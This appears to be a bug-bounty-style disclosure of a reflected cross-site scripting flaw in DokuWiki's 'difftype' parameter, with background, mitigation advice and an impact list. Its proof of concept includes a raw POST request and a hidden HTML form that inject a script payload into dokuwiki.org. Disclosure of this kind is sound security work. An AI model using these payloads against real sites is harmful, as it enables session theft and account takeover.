Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

while surfing dokuwiki.org with burpsuit i noticed that dokuwiki is using global like variables difftype , DOKU_PREFS and it`s vulnerable to XSS

Proof of Concept

• you can send this request and capture it with burp and notice the alert

POST /start HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www.dokuwiki.org/
Cookie: DokuWiki=57vk0n23v486p8vdjqc15oigpu; DOKU_PREFS=show_changes%23both%23difftype%23sidebyside
Content-Length: 139
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Host: www.dokuwiki.org
Connection: Keep-alive

difftype=sidebyside'"()%26%25<zzz><ScRiPt%20>alert("XSS_By_Strik3r")</ScRiPt>&do=diff&do[diff]=1&id=ttps:start&rev2[0]=1&rev2[1]=0&sectok=1

• i added HTML file below. When someone opens this html file, or we can add it into our website, XSS will execute.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.dokuwiki.org/start" method="POST">
      <input type="hidden" name="difftype" value="sidebyside&apos;&quot;&#40;&#41;&amp;&#37;&lt;zzz&gt;&lt;ScRiPt&#32;&gt;alert&#40;9513&#41;&lt;&#47;ScRiPt&gt;" />
      <input type="hidden" name="do" value="diff" />
      <input type="hidden" name="do&#91;diff&#93;" value="1" />
      <input type="hidden" name="id" value="ttps&#58;start" />
      <input type="hidden" name="rev2&#91;0&#93;" value="1" />
      <input type="hidden" name="rev2&#91;1&#93;" value="0" />
      <input type="hidden" name="sectok" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

How to prevent XSS attacks:

Preventing cross-site scripting is trivial in some cases but can be much harder depending on the complexity of the application and the ways it handles user-controllable data. In general, effectively preventing XSS vulnerabilities is likely to involve a combination of the following measures:

• Filter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input.
• Encode data on output. At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content.
• Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.
• Use appropriate response headers. To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend.
• Content Security Policy. As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.

Impact

The consequence of an XSS attack is the same regardless of whether it is stored or reflected (or DOM Based). The difference is in how the payload arrives at the server. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

• 1. Perform any action within the application that the user can perform.
• 2. View any information that the user is able to view.
• 3. Modify any information that the user is able to modify.
• 4. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.